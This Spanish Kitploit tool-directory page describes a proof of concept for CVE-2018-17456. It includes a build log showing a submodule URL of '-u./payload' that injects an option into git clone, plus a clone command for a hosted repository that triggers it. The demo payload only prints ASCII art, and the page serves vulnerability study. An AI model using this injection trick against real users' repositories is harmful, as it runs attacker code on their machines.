Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2018-17456 — CVE-2018-17456 Reproducción de la vulnerabilidad(PoC+Exp) | Kitploit
Herramientas/GitHubGitHub/anonymking/cve-2018-17456
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónSeguridad de Cadena de SuministroAprendizaje y EducaciónExplotación de Binarios
GitHubanonymking/cve-2018-17456

CVE-2018-17456

CVE-2018-17456 Reproducción de la vulnerabilidad(PoC+Exp)

Ver Repositorio
5hace 7 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2018-17456

Resumen de la vulnerabilidad

  • Nombre de la vulnerabilidad: Vulnerabilidad de error de validación de entrada de Git
  • Número CNNVD: CNNVD-201810-234
  • Nivel de peligro: Muy crítico
  • Número CVE: CVE-2018-17456
  • Tipo de vulnerabilidad: Error de validación de entrada
  • Fecha de publicación: 2018-10-08
  • Tipo de amenaza: Remota
  • Fecha de actualización: 2019-04-25
  • Proveedor: debian
  • Fuente de la vulnerabilidad: Atlassian,TerryZh...
  • Descripción: Git es un sistema de control de versiones distribuido gratuito y de código abierto. Existe una vulnerabilidad de error de validación de entrada en Git. Esta vulnerabilidad se debe a que el sistema o producto de red no verifica correctamente los datos de entrada. Las siguientes versiones están afectadas: versiones anteriores a Git 2.14.5, versiones 2.15.x anteriores a 2.15.3, versiones 2.16.x anteriores a 2.16.5, versiones 2.17.x anteriores a 2.17.2, versiones 2.18.x anteriores a 2.18.1, versiones 2.19.x anteriores a 2.19.1.

Replicación de la vulnerabilidad

  • Debido a problemas del mecanismo de seguridad de GitHub, no se pueden cargar proyectos maliciosos, por lo que puedes ejecutar el script build.sh para construir este proyecto localmente para aprendizaje y pruebas.
  • La versión de Git que uso es git-2.12.1
  • El proceso y el resultado son los siguientes:
root@kitploit:~
[anonymking@localhost test]$ ./build.sh 
Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-17456-PoC/Submodule/.git/
[master (root-commit) 5b1e97c] submodule
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 hgt_blank
Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC/.git/
Cloning into '/home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC/exploit:exploit'...
done.
[master (root-commit) ed1914d] CVE-2018-17456
 3 files changed, 6 insertions(+)
 create mode 100644 .gitmodules
 create mode 160000 exploit:exploit
 create mode 100755 payload
git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC" des_dir



[anonymking@localhost test]$ git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC" test
Cloning into 'test'...
done.
Submodule 'exploit:exploit' (-u./payload) registered for path 'exploit:exploit'
Cloning into 'exploit'...


*********************************************
                   _ooOoo_
                  o8888888o
                  88" . "88
                  (| -_- |)
                  O\  =  /O
               ____/`---'\____
             .'  \\|     |//  `.
            /  \\|||  :  |||//  \
           /  _||||| -:- |||||-  \
           |   | \\\  -  /// |   |
           | \_|  ''\---/''  |   |
           \  .-\__  `-`  ___/-. /
         ___`. .'  /--.--\  `. . __
      ."" '<  `.___\_<|>_/___.'  >'"".
     | | :  `- \`.;`\ _ /`;.`/ - ` : | |
     \  \ `-.   \_ __\ /__ _/   .-` /  /
======`-.____`-.___\_____/___.-`____.-'======
                   `=---='
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
fatal: clone of '-u./payload' into submodule path '/home/anonymking/Desktop/test/test/exploit:exploit' failed
Failed to clone 'exploit:exploit' a second time, aborting
  • El código malicioso que construí en el payload es generar un Buda, por lo que ver a Buda significa que la prueba fue exitosa; en realidad, esto se imprime dos veces porque hay un reintento cuando falla la clonación del subproyecto.

Referencias

  • Proyecto poc-submodule

Descubrimiento inesperado

  • Inesperadamente, construí con éxito este proyecto en Coding — CVE-2018-17456
  • Método de uso:
root@kitploit:~
git clone --recursive https://dev.tencent.com/u/anonymking/p/CVE-2018-17456/git test
  • Además, se recomienda estudiar juntas dos vulnerabilidades similares: CVE-2017-1000117 CVE-2018-11235
Descargar herramienta